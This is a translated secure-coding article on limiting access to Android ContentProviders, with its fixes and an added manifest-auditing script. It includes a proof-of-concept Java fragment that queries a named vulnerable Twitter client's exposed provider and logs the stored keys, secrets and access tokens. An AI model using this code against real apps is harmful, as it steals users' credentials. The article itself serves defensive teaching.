This article is translated from https://www.securecoding.cert.org/confluence/display/java/DRD01-J.+Limit+the+accessibility+of+an+app%27s+sensitive+content+provider, with additions and deletions.
The ContentProvider class provides a mechanism for managing and sharing data with other apps. When sharing provider data with other apps, you must carefully implement access control to prevent unauthorized access to sensitive data.
There are three ways to restrict access to ContentProvider:
Public
Private
Restricted Access
[Public]
Declaring the android:exported attribute in the AndroidManifest.xml file makes a ContentProvider public to other apps. At Android API level 16 and earlier, a ContentProvider is public by default unless android:exported="false" is explicitly declared. For example:
<provider android:exported="true" android:name="MyContentProvider" android:authorities="com.example.mycontentprovider" />
If ContentProvider is set to public, the data stored in ContentProvider can be accessed by other apps. Therefore, the design must ensure that only non-confidential information is disclosed.
[Private]
Declaring the android:exported attribute in the AndroidManifest.xml file can also set a ContentProvider to private. From Android API level 17 onward, a ContentProvider is private by default and does not need the explicit declaration. For example:
<provider android:exported="false" android:name="MyContentProvider" android:authorities="com.example.mycontentprovider" />
If a ContentProvider does not need to share data with other apps, declare android:exported="false" in the manifest file. Note that at API level 8 and earlier, even if you explicitly declare android:exported="false", the corresponding ContentProvider can still be accessed by other apps.
[Restricted Access]
(To be continued.)
[Code examples that do not meet security requirements]
MovatwiTouch, a Twitter client, uses a ContentProvider to manage the Twitter user's key, secret and access token, but this ContentProvider is public, which makes it possible for other apps installed on the same phone to obtain this sensitive information.
The provider declaration in the following AndroidManifest.xml file does not specify the android:exported attribute, so the ContentProvider is public before API level 16.
<provider android:name=".content.AccountProvider" android:authorities="jp.co.vulnerable.accountprovider" />
[Proof of concept]
The following code shows how a public ContentProvider can be exploited:
// Fragment from an Activity method. Needs android.content.pm.ApplicationInfo,
// android.content.pm.PackageManager.NameNotFoundException, android.database.Cursor,
// android.net.Uri and android.util.Log.
// Check whether Movatwi is installed.
try {
    ApplicationInfo info = getPackageManager().getApplicationInfo("jp.co.vulnerable", 0);
} catch (NameNotFoundException e) {
    Log.w(TAG, "the app is not installed.");
    return;
}
// Extract account data through the content provider.
Uri uri = Uri.parse("content://jp.co.vulnerable.accountprovider");
Cursor cur = getContentResolver().query(uri, null, null, null, null);
StringBuilder sb = new StringBuilder();
if (cur != null) {
    int ri = 0;
    while (cur.moveToNext()) {
        ++ri;
        Log.i(TAG, String.format("row[%d]:", ri));
        sb.setLength(0);
        for (int i = 0; i < cur.getColumnCount(); ++i) {
            String column = cur.getColumnName(i);
            String value = cur.getString(i);
            if (value != null) {
                // Strip line breaks so each value stays on one log line.
                value = value.replaceAll("[\r\n]", "");
            }
            Log.i(TAG, String.format("\t%s:\t%s", column, value));
        }
    }
    cur.close();
} else {
    Log.i(TAG, "Can't get the app information.");
}
[Solutions]
In the AndroidManifest.xml file, explicitly declare the ContentProvider as android:exported="false":
<provider android:name=".content.AccountProvider" android:exported="false" android:authorities="jp.co.vulnerable.accountprovider" />
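To check a manifest against the rules in the [Public] and [Private] sections, the following added example (not part of the original article or the CERT rule) audits the provider declarations of a decoded AndroidManifest.xml. The function name, the sample manifest and its SDK levels are constructed for illustration; it assumes that the API level which matters is the lower of minSdkVersion and targetSdkVersion for the default, and minSdkVersion for the API level 8 caveat.

```python
import xml.etree.ElementTree as ET

ANDROID = "{http://schemas.android.com/apk/res/android}"

def audit_providers(manifest_xml):
    """Return (provider name, finding) pairs for a decoded AndroidManifest.xml."""
    # For manifests from untrusted APKs, parse with defusedxml instead.
    root = ET.fromstring(manifest_xml)
    sdk = root.find("uses-sdk")
    # Assumption: SDK levels are plain integers; a missing minSdkVersion means 1
    # and a missing targetSdkVersion defaults to minSdkVersion.
    min_sdk = int(sdk.get(ANDROID + "minSdkVersion", "1")) if sdk is not None else 1
    target = int(sdk.get(ANDROID + "targetSdkVersion", min_sdk)) if sdk is not None else min_sdk
    findings = []
    for provider in root.iter("provider"):
        name = provider.get(ANDROID + "name")
        exported = provider.get(ANDROID + "exported")
        if exported == "true":
            findings.append((name, "public: android:exported is true"))
        elif exported is None and min(min_sdk, target) <= 16:
            # No attribute: public by default at API level 16 and earlier.
            findings.append((name, "public by default: android:exported not set"))
        elif exported == "false" and min_sdk <= 8:
            # The declaration is not honoured at API level 8 and earlier.
            findings.append((name, "exported=false not enforced at API level <= 8"))
    return findings

# Constructed sample manifest reusing the provider names from this article.
SAMPLE_MANIFEST = """<manifest
    xmlns:android="http://schemas.android.com/apk/res/android"
    package="jp.co.vulnerable">
  <uses-sdk android:minSdkVersion="8" android:targetSdkVersion="15"/>
  <application>
    <provider android:name=".content.AccountProvider"
              android:authorities="jp.co.vulnerable.accountprovider"/>
    <provider android:name="MyContentProvider" android:exported="false"
              android:authorities="com.example.mycontentprovider"/>
  </application>
</manifest>"""

if __name__ == "__main__":
    for name, finding in audit_providers(SAMPLE_MANIFEST):
        print(f"{name}: {finding}")
```

An empty result means that no provider is reachable through android:exported alone; it says nothing about the contents of a provider that is deliberately public.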
-- Reprints are welcome; please cite the source http://blog.csdn.net/asce1885. Do not use for commercial purposes without my consent. --